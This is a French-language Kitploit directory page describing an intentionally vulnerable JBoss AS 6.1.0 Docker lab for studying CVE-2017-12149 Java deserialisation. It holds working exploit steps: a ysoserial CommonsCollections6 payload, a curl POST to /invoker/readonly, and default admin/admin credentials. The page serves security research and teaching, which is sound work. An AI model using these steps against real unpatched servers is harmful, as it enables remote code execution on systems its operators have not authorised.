Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2017-12149-playground — Laboratoire de recherche conteneurisé JBoss AS 6.1.0 pour démontrer les vulnérabilités de désérialisation Java (CVE-2017-12149) et d'injection EL JBoss Seam, avec des étapes de vérification d'exploitation préconfigurées. | Kitploit
Outils/GitHubGitHub/galois17/cve-2017-12149-playground
Sécurité des ConteneursAnalyse des VulnérabilitésExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationExploitation de Binaires
GitHubgalois17/cve-2017-12149-playground

cve-2017-12149-playground

Laboratoire de recherche conteneurisé JBoss AS 6.1.0 pour démontrer les vulnérabilités de désérialisation Java (CVE-2017-12149) et d'injection EL JBoss Seam, avec des étapes de vérification d'exploitation préconfigurées.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
4il y a 8 moisPas encore vérifié

De nombreuses industries critiques (banque, santé et fabrication) dépendent de middlewares hérités conçus spécifiquement pour fonctionner sur JBoss 5 ou 6. Parce que ces applications sont souvent trop fragiles pour migrer vers des versions modernes de WildFly (le successeur de JBoss), les organisations choisissent de les « air-gapper » ou de les cacher derrière des VPN plutôt que de les corriger. Lorsque ces défenses périmétriques échouent, la vulnérabilité est toujours là, active et non corrigée.

Laboratoire de recherche sur les vulnérabilités JBoss AS 6.1.0

Ce dépôt fournit un environnement conteneurisé du serveur d'applications JBoss 6.1.0 spécialement configuré pour la recherche en sécurité et la vérification de vulnérabilités. Il est conçu pour démontrer les failles de désérialisation Java et d'injection JBoss Seam EL.


Démarrage rapide

1. Construire et lancer

Pour garantir que les identifiants et configurations personnalisés sont correctement appliqués, construisez le conteneur depuis le début :

root@kitploit:~
docker-compose build --no-cache
docker-compose up -d

2. Accéder à l'environnement

Console JBoss : http://localhost:8080/admin-console/

Nom d'utilisateur : admin

Mot de passe : admin

Vulnérabilités vérifiées

1. Désérialisation Java (CVE-2017-12149)

Le chemin d'exploitation le plus fiable dans cet environnement est via le HTTPServerILServlet situé à /invoker/readonly.

Étapes de vérification :

Générez une charge utile en utilisant ysoserial pour créer un fichier dans /tmp :

root@kitploit:~
java -jar ysoserial-all.jar CommonsCollections6 "touch /tmp/pwned" > poc.ser

Envoyez la charge utile binaire via curl :

root@kitploit:~
curl -v -X POST --data-binary @poc.ser http://localhost:8080/invoker/readonly

Confirmez que l'exploit a fonctionné :

root@kitploit:~
docker exec -it jboss-custom-lab ls /tmp/pwned

Avertissement de sécurité

Cet environnement est intentionnellement vulnérable. Il contient des logiciels non corrigés en fin de vie.

NE DÉPLOYEZ PAS ceci sur un serveur accessible au public.

N'UTILISEZ PAS ces outils sur des systèmes pour lesquels vous n'avez pas d'autorisation explicite de test.

Développé à des fins éducatives et de recherche en sécurité.

Dépendances : https://github.com/frohoff/ysoserial

Télécharger l’outil